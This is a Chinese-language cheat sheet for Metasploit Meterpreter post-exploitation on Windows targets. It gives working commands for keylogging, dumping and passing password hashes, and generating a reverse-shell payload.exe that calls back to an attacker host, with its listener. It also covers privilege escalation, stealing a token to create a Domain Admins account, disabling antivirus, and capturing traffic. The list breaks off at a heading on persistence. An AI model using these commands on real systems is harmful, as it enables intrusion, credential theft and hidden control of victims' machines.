一、基本命令
截屏
screenshot
2.获取系统平台信息
sysinfo
3.进程信息
ps
4.获取键盘记录
查看进程信息ps--migrate将会话迁移至explorer.exe进程空间中---然后--
run post/windows/capture/keylog_recorder
过一段时间CTRL+C中止。
最后在另一个终端里,可以看到我们使用键盘记录所捕捉的内容。
5.提取密码哈希
use priv运行特权账号
run post/windows/gather/hashdump
6.传递hash值
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
7.权限提升
当我们获得了目标系统的访问权限,可以通过net user命令创建限制权限的普通用户帐号。
XP系统中:
net user bob password123 /add.
然后,创建一个基于Meterpreter的攻击程序payload.exe,复制到目标XP机器上,并在bob用户下运行。
利用攻击载荷生成器(msfpayload)来创建Windows可执行文件格式的Meterpreter攻击载荷程序payload.exe.
root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.33.139 LPORT=443 X>payload.exe
root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=192.168.33.139 LPORT=443 E
meterpreter> getuid
创建载荷时,设置LHOST和LPORT参数指示了反向shell连接到攻击机的地址和端口443,
随后调用msfcli接口进行监听并等待连接,当有连接到达时,将会开启Meterpreter的shell。
shell
use priv
getsystem
getuid
8.令牌假冒
在令牌假冒攻击中,我们获取目标系统中的一个Kerberos令牌,将其用在身份认证环节,来假冒当初创建这个令牌的用户。这是Meterpreter最强大的功能之一。
用户登录服务器时,一个Kerberos令牌会在服务器上在一段时间内保持有效。
我们就可以利用这个令牌入侵系统,而不需破解他的密码。
9.使用PS
使用PS查看进程
使用steal_token命令和PID参数,盗取域管理员用户的令牌。PID为域管理员运行的进程
另外,有些情况下PS命令不能列出域管理员运行的进程,我们可以使用incognito命令列出系统中可用的令牌。
最好是同时检查ps命令和incognito命令的输出结果。
通过use incognito命令加载incognito模块,然后通过list_tokens -u列出令牌。
假冒令牌:
impersonate_token ****\***(注意双斜杠)
添加用户:
add_user omgcom password123 -h 192.168.33.50(域控)
赋予域管理员权限:
add_group_user "Domain Admins" omgcom -h 192.168.33.50
10.跳板攻击(Pivoting)
允许从Meterpreter 终端攻击网络中的其他系统。
跳板攻击允许你使用已经取得控制的Meterpreter终端来攻击内部网络中的其他机器。
11.使用Meterpreter脚本
run 脚本名字
12.迁移进程
攻击系统时常常利用IE漏洞等,如果目标主机关闭了浏览器,Meterpreter会话也随之关闭,从而导致目标丢失。
渗透以后要将会话迁移到内存空间稳定的、不会关闭的服务进程中,以维持稳定的控制。
run post/windows/manage/migrate
13.关闭杀毒软件
run killav
14。获取系统密码hash
run hashdump
15.查看目标所有流量
run packetrecorder -i 1
16.获取系统信息
Scraper脚本可以获取用户名、密码、注册表、哈希值、收集系统信息等。
run scraper
17。控制持久化